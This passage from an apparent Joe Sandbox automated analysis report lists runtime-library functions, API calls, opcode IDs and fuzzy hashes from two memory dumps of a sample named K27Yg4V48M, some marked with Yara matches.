                                                                                                    • __freea.LIBCMT ref: 02136BF5
                                                                                                      • Part of subcall function 0213390E: RtlAllocateHeap.NTDLL(00000000,0210DAD7,00000000), ref: 02133940
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
                                                                                                    • Instruction ID: ff8a135dbdf18a4a34f186d05aa5dccc81a3155c0c99379618e9f0c979cd32b3
                                                                                                    • Opcode Fuzzy Hash: 741c0c8b2752cf52d6a3b4cb7e308d013327ca6cb40bf2aaa7dfc05a94fe856d
                                                                                                    • Instruction Fuzzy Hash: F731E032A0024AAFDF358F64CC40DEE7BAAEB40714B044268EC14DB190EB36C955CFA4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                    • String ID:
                                                                                                    • API String ID: 531285432-0
                                                                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                    • String ID:
                                                                                                    • API String ID: 531285432-0
                                                                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                    • Instruction ID: 96f1bb8a5de8d2098d09bb39ef9ebe586bf93f492eb5ebafbb0d36c72bb381cc
                                                                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                    • Instruction Fuzzy Hash: 6E214C75A40209AFDF14EFA5DC819BEBBB9EF09714F100065E901A7290DBB0AD018FA0
                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 2630251706-0
                                                                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1339878773-0
                                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0212934A
                                                                                                      • Part of subcall function 02129297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021292C6
                                                                                                      • Part of subcall function 02129297: ___AdjustPointer.LIBCMT ref: 021292E1
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0212935F
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02129370
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 02129398
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction ID: 9a146f434bdd99edb57121be0eb686d69ccdb0668bb904cc983f490563f28a10
                                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                    • Instruction Fuzzy Hash: 2C010272140158BFDF126EA9CD40EEB3F6AEF88754F144418FE08A6120D332E875ABA0
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                    • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0213513D,00000000,00000000,00000000,00000000,?,021353F5,00000006,0044A378), ref: 021351C8
                                                                                                    • GetLastError.KERNEL32(?,0213513D,00000000,00000000,00000000,00000000,?,021353F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02132213), ref: 021351D4
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0213513D,00000000,00000000,00000000,00000000,?,021353F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021351E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction ID: fd2e25a82146c8aaf80c436ba0b8aaa34593eedc732b78a217304a7b242e41d4
                                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                    • Instruction Fuzzy Hash: 2B01DB36692226BBC7324F799C44E57BB9BBF4EFA27510630F916E7141D720D900CAE4
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                    • String ID:
                                                                                                    • API String ID: 78362717-0
                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021263AF
                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021263C3
                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021263DB
                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021263F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                    • String ID:
                                                                                                    • API String ID: 78362717-0
                                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction ID: 7edea79a9b9146011ec0c1a84a816b29f29ade0fd4a31abd66024575eaf66863
                                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                    • Instruction Fuzzy Hash: 4F01D632640174ABDF16EE54D940AAF779E9F85350F010015FC25A72C1DB70ED288AA0
                                                                                                    APIs
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 02122BB1
                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BCF
                                                                                                      • Part of subcall function 02118687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021186A8
                                                                                                      • Part of subcall function 02118687: Hash.LIBCMT ref: 021186E8
                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BD8
                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BF8
                                                                                                      • Part of subcall function 0211F6DF: Hash.LIBCMT ref: 0211F6F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                    • String ID:
                                                                                                    • API String ID: 2250070497-0
                                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                    • Instruction ID: 7e8d790f007b48ac1381a92c1ed44e36bc26e6fd0d8ef8dc9355ea1e113778c8
                                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                    • Instruction Fuzzy Hash: BA118E76400204AFC715DF64C881ACAF7B9AF19320F00861EE95687591DB70E958CBA0
                                                                                                    APIs
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 02122BB1
                                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BCF
                                                                                                      • Part of subcall function 02118687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 021186A8
                                                                                                      • Part of subcall function 02118687: Hash.LIBCMT ref: 021186E8
                                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BD8
                                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BF8
                                                                                                      • Part of subcall function 0211F6DF: Hash.LIBCMT ref: 0211F6F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                    • String ID:
                                                                                                    • API String ID: 2250070497-0
                                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                    • Instruction ID: 6c2de04a55dbb3abbaae9b289ca53ea7b0b1f726e510fa983afc3a2565621f2c
                                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                    • Instruction Fuzzy Hash: 2E012976400604AFC724DF65C881EDAF7E9EF49320F008A2EE55A87550DBB1F959CFA0
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 021050D1
                                                                                                      • Part of subcall function 0210BDAE: __EH_prolog3_GS.LIBCMT ref: 0210BDB5
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 0210511C
                                                                                                    • __Getcoll.LIBCPMT ref: 0210512B
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0210513B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                    • Instruction ID: c22790213ded58ee335fc1eccced79348204b33b6f6a111a950abc4cae0d132a
                                                                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                    • Instruction Fuzzy Hash: DD019A71C90308EFDB00EFA4C480B9CBBB2BF58355F50812AD054AB2C0DBB49A84CF95
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 02105B8D
                                                                                                      • Part of subcall function 0210BDAE: __EH_prolog3_GS.LIBCMT ref: 0210BDB5
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 02105BD8
                                                                                                    • __Getcoll.LIBCPMT ref: 02105BE7
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105BF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836011271-0
                                                                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                    • Instruction ID: 9e0688dfb3a0836a6edaa0eb3ddc533e6cfb4cdd1342340c9cd93ea1329e1114
                                                                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                    • Instruction Fuzzy Hash: 43018871880208EFDF04EFA4C4C0B9DB7B2BF08315F10802AE055AB280DBB89984CF91
                                                                                                    APIs
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3973403980-0
                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                    APIs
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C170
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C180
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C190
                                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C1A4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3973403980-0
                                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction ID: ed0692d7b5aa3c2e401f08a2c838433e7c1a1a5fa6cb3e0040ba11161aaa18ce
                                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                    • Instruction Fuzzy Hash: 0201A87A4C8149EBDF169E94EC028AD3B67AB15250F048422F92884460D732C670AAC2
                                                                                                    APIs
                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                      • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                      • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                    • String ID:
                                                                                                    • API String ID: 4284812201-0
                                                                                                    • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                    • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                    • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                    • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                    APIs
                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                      • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                      • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                    • GetLastError.KERNEL32 ref: 00413541
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                      • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1674182817-0
                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                    APIs
                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0211378C
                                                                                                      • Part of subcall function 02112B16: ___crtGetTimeFormatEx.LIBCMT ref: 02112B2C
                                                                                                      • Part of subcall function 02112B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02112B4B
                                                                                                    • GetLastError.KERNEL32 ref: 021137A8
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021137BE
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021137CC
                                                                                                      • Part of subcall function 021128EC: SetThreadPriority.KERNEL32(?,?), ref: 021128F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
